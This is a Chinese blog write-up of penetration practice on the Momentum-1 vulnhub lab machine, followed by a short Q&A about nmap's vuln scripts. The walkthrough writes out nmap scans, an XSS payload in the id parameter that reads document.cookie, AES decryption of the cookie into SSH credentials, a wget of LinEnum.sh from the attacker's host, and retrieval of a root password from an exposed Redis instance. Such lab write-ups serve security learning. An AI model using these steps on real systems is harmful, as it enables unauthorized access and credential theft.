记录一次vuln靶场的渗透过程---Momentum-1

记录靶场练习


一、主机发现

首先按照惯例,利用nmap进行主机发现,顺便将开放端口也扫描出来。扫描自己主机所在的网段。

nmap 192.168.216.0/24

可以看到IP地址和开放了22和80端口,接下来对服务器信息进行详细的扫描

nmap -A -v -T4 192.168.216.143

 

 网站是使用Apache中间件搭建的,服务器是Debian

二、漏洞发现

访问80端口,看起来并没有特别的地方,只是一个图片展示的网站。


接下来对这个网站进行目录结构扫描,看看是否能扫出有用的文件

依次访问查看是否能够得到有用的信息,访问后img目录和css目录页都是正常的,但是在查看js目录后,发现了一段代码,不知道什么意思。

于是网上查找,就是在url后加上这一段就会跳转到另一个页面,试着尝试访问了一下。

 发现无论在id下输入什么字符,都会显示出来,怀疑有xss漏洞,接着上poc

http://192.168.216.143/opus-details.php?id=%3Cscript%3Ealert(%221%22)%3C/script%3E

 

 nice!果然存在漏洞。

三、漏洞利用

利用该漏洞尝试获取cookie信息

id=<script>alert(document.cookie)</script>

很明显这是一个加密后的值,具体是什么加密还不清楚。到这里发现

 在这里有我们之前忽略掉的一段代码,可能是利用了“SecretPassphraseMomentum”对cookie信息进行了AES解密,在网上寻找在线解密网站解密后为“auxerre-alienum##”,而且想到服务器还开启了22端口,所以猜想这是一个账号和密码的组合

尝试了几个组合后,才登录了进去

auxerre alienum
alienum auxerre
auxerre alienum##
alienum## auxerre
auxerre auxerre-alienum
alienum auxerre-alienum
正确:auxerre auxerre-alienum##

附上参考网站:AES加密-AES解密-在线AES加密解密工具 (jsons.cn)

其实完全可以编写一个脚本进行测试,这样就不用一个个的去尝试,效率更高。

使用kali连接到服务器

ssh auxerre@192.168.216.143

 第一个flag拿到

 后续还需进行提权操作。

四、权限提升

在攻击机搭建一个http服务

python3 -m http.server 8001

在靶机下载LinEnum.sh

wget http://192.168.216.128:8001/LinEnum.sh

bash运行脚本收集系统信息保存到1.txt文件

 有一个6379端口被监听,而且6379是Redis的默认端口,查看端口占用信息

Redis 服务因配置不当,可被攻击者恶意利用。黑客借助 Redis 内置命令,可将现有数据恶意清空;如果 Redis 以 root 身份运行,黑客可往服务器上写入 SSH 公钥文件,直接登录服务器。

 所以连接上数据库尝试提权

 

 查看redis服务下的键,发现有“rootpass”,怀疑是root密码,而且联系上上面“auxerre-alienum##”的关系,猜测"m0mentum-al1enum##"就是root的密码。

成功提权到root,拿到最后一个flag!

撒花!!!

总结

XSS漏洞

AES加密

枚举

LinEnum脚本收集服务器信息

Redis服务6379端口,查看所有key--keys *

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
### 回答1: nmap --script=vuln是一个nmap命令,用于扫描目标主机的漏洞。该命令会使用nmap的漏洞扫描脚本(vuln)来检测目标主机上可能存在的漏洞。使用该命令可以帮助管理员及时发现并修复系统中的漏洞,提高系统的安全性。 ### 回答2: nmap是一种常用的网络扫描工具,可以用来检测网络上的设备并识别它们的服务和操作系统信息。同时,nmap还提供了一些强大的脚本和工具箱,以帮助用户发现系统中可能存在的漏洞。 使用“nmap --script=vuln”命令可以使用nmap内置的漏洞扫描脚本,这些脚本能够检测目标系统中可能存在的安全漏洞。该命令会启用所有的漏洞扫描脚本,并提供有关目标系统检测结果的详细信息。 在使用“nmap --script=vuln”命令进行漏洞扫描时,可以通过在命令行上使用“-p”参数来指定要扫描的端口范围。对于大型网络中的目标系统,也可以通过指定IP地址范围或使用文件来进行扫描。 当nmap执行漏洞扫描脚本时,脚本会自动检测目标系统中存在的漏洞并生成报告。该报告包含了有关检测到的漏洞的详细信息,例如漏洞名称、等级和漏洞对应的CVE编号等。在扫描过程中,可以使用“-vvv”参数来显示更详细的扫描信息,以便更好地了解扫描的情况。 对于系统管理员和安全专业人士来说,nmap的漏洞扫描功能对于确保系统安全和保护系统免受攻击至关重要。然而,使用该命令进行系统扫描和漏洞检测需要谨慎,因为它可能会导致系统故障或误报漏洞。在使用nmap进行系统扫描之前,确保您已经获得同意,并且对扫描的目标系统进行备份和恢复。 ### 回答3: nmap是一款用于扫描网络主机的开源工具,其功能强大,支持多种操作系统。nmap自带的脚本能够实现许多针对主机的基本漏洞测试,其中就包括vuln脚本。 nmap --script=vuln是指使用vuln脚本来扫描目标网络主机,该脚本是nmap自带的一个组件,用于检测主机是否存在已知的漏洞。如果存在漏洞,则通过输出详细的报告提供可能存在的风险。 使用vuln脚本的方式简单直接,只需要在nmap命令行后加上--script=vuln即可进行扫描。扫描完毕后,nmap会输出详细报告,包含目标主机的漏洞及可能受到的影响。 总体来说,nmap --script=vuln用于检测目标网络主机的漏洞并提供风险报告,有效促进网络安全运营。但是需要注意的是,该脚本只能检测到已知的漏洞,因此不能完全替代其他安全测试工具的使用。在实际应用中,应该综合考虑多种工具的使用,提升网络安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值